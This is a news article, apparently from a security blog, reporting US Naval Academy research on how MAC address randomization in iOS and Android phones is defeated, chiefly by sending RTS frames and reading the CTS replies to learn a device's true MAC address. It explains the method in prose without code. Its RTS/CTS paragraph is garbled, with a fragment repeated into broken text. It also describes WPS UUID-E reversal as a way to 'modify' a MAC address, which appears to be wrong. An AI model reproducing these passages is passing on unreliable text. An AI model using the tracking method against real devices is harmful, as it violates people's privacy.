Security Flaws in MAC Address Randomization Technique makes iOS, Android Devices Vulnerable to Tracking


Tracking mobile phones has become relatively easier since the advent of smartphones and wireless connectivity as these devices become traceable when they move across public Wi-Fi networks.

MAC address randomization is a technique that is used to secure mobile devices from being traced.

What MAC does is it replaces the unique ID that makes a mobile’s wireless hardware detectable with some randomly generated numbers, thereby making it difficult to trace the device and preventing it from being exploited by malicious cyber-criminals.

It is a helpful technique since your smartphone’s MAC address is usually logged by owners of public Wi-Fi such as at retail outlets so that customers could be recognized the moment they walk in.

This is the same case that we have noticed in public wireless hotspots. For instance, in the UK, Transport for London uses this strategy to monitor Tube passengers.

In theory, there is no problem with adopting such practices if the primary goal is to identify customers. However, it becomes a real issue when the data is sold to marketers and ad firms.

But, what we have come to know after the publishing of research report from US Naval Academy is that even MAC address randomization technique is flawed and contain implementation related vulnerabilities, which makes the entire purpose of using it completely useless.

U.S. Naval Academy researchers identified serious flaws in a majority of the Android implementations of MAC randomization, allowing them to break the protection in the case of roughly 96 percent of mobile devices they have tested.

“First, we show that devices commonly make improper use of randomization by sending wireless frames with the true, global address when they should be using a randomized address.” reads the paper published by the experts.

“We move on to extend the passive identification techniques of Vanhoef et al. to effectively defeat randomization in 96% of Android phones. Finally, we show a method that can be used to track 100% of devices using randomization, regardless of manufacturer, by exploiting a previously unknown flaw in the way existing wireless chipsets handle low-level control frames.”

The experts also analyzed so-called Karma attacks, a method that leverages on rogue access points (EvilAP attack) that pose as known and trusted networks.

They researchers devised a new method that relies on Request-to-Send (RTS) and Clear-to-Send (CTS) control frames to expose the global MAC address for any kind of device.

According to the IEEE 802.11 specification, the RTS and CTS control frames are used to avoid collisions, basically every time a node using the channel to send data, it transmits also an RTS frame to inform other nodes that the channel should not be used in order to avoid collisions. time a node in using the channel to send data, it transmits also an RTS frame to inform other nodes that the channel should not be used in order to avoid collisions. time a node in. time a node in

The recipient node responds with a CTS frame when it is ready to receive data.

The knowledge of this mechanism could be exploited by attackers that can send an RTS frame to IEEE 802.11 client devices, then analyzing the CTS response it can derive the global MAC address of the target. Once obtained the global MAC address, the attacker can use it to track the target device in the future by sending it RTS frames containing the global MAC.

The group of expert successfully tested the technique on several models from multiple vendors, including iPhone 5s, iPhone 6s, iPad Air, Google Pixel, LG Nexus 5X, LG G4 and G5, Motorola Nexus 6, Moto Z Play and OnePlus 3.

MAC address randomization flaws

Experts speculate RTS/CTS responses are managed within the 802.11 chipset, instead of the operating system, this means the only way to prevent the attacks is to develope a firmware patch that have to be distributed by manufactures.

“There are multiple scenarios in which a motivated attacker could use this method to violate the privacy of an unsuspecting user. If the global MAC address for a user is ever known, it can then be added to a database for future tracking,” added the researchers. “Conceivably, an adversary with a sufficiently large database and advanced transmission capabilities could render randomization protections moot.”

The experts highlighted the importance to adopt a universal randomization policy with clear requirements for the implementation of the protection mechanism.

“We propose the following best practices for MAC address randomization. Firstly, mandate a universal randomization policy to be used across the spectra of 802.11 client devices. We have illustrated that when vendors implement unique MAC address randomization schemes it becomes easier to identify and track those devices.” concluded the experts. “A universal policy must include at minimum, rules for randomized MAC address byte structure, 802.11 IE usage, and sequence number behavior,” 

Another important issue is that on a majority of Android devices, MAC address randomization isn’t enabled.

The research report was published on Wednesday, and it stated that the researchers successfully tracked 100% of devices (regardless of their make and model) using randomization.

They managed to do that by exploiting a vulnerability that existed in the way wireless chipsets handled low-level control frames.

Apart from an active Request to Send or RTS attack, the team of researchers was able to identify various alternative deanonymization techniques that were also applicable to a wide range of mobile phones.

The focus of the study was to analyze iOS and Android devices only.

It was noted that every single 802.11 network interface of a mobile phone had a 48-bit MAC address layer-2 hardware identifier.

This is supposed to be unique on a universal basis.

They also focused on devices that weren’t associated with a network access point because this is where the real work of unique global MAC addresses start.

Previous studies in this context discovered flaws prevailing in the Wi-Fi Protected Setup (WPS) protocol, which can potentially be used to modify the MAC address of a device.

The technique that allows this to happen is called Universally Unique IDentifier-Enrollee (UUID-E) reversal.

The current study from US Naval Academy took this previous work into account to focus on randomized MAC address implementations.

They identified that although there are randomization capabilities available, a majority of Android devices aren’t implementing them despite the fact that the Android OS has it built-in to it.

Due to this, tracking of Android devices becomes trivial. As per the researchers, the 802.11 chipset and firmware incompatibilities might be the reason behind it.


Please enter your comment!
Please enter your name here

Questo sito usa Akismet per ridurre lo spam. Scopri come i tuoi dati vengono elaborati.